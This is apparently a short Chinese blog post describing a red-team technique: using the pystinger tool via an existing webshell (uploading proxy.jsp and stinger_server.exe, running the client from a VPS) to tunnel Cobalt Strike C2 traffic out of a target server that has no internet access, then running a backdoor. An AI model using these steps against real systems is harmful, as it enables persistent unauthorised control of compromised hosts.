pystinger实现不出网情况下,上线CS的方式

某hw过程中遇到如下情况:

获取到webshell,目标服务器不出网

目标机:内网地址,端口映射到公网ip
vps:
pystinger实现不出网情况下,上线CS的方式_第1张图片

pystinger地址:

https://github.com/FunnyWolf/pystinger
python3 -m pip install  -r  requirement.txt

目标机操作:

1、proxy.jsp上传到目标服务器,确保http://example.com:8080/proxy.jsp可以访问
,页面返回UTF-8
2、stinger_server.exe上传到目标服务器,
AntSword运行cmdstart D:/XXX/stinger_server.exe启动pystinger-server
不要D:/xxx/singer_server.exe直接运行,会造成TCP断开

互联网微PS操作:

3、python3 ./stinger_client.py -w 
http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

pystinger实现不出网情况下,上线CS的方式_第2张图片
CS监听器配置

HTTP Hosts:127.0.0.1
HTTP Hosts(stager):目标及内网ip
HTTP Port(C2):60020

pystinger实现不出网情况下,上线CS的方式_第3张图片
s生成后门在目标机运行
在这里插入图片描述

你可能感兴趣的:(内网渗透,网络安全)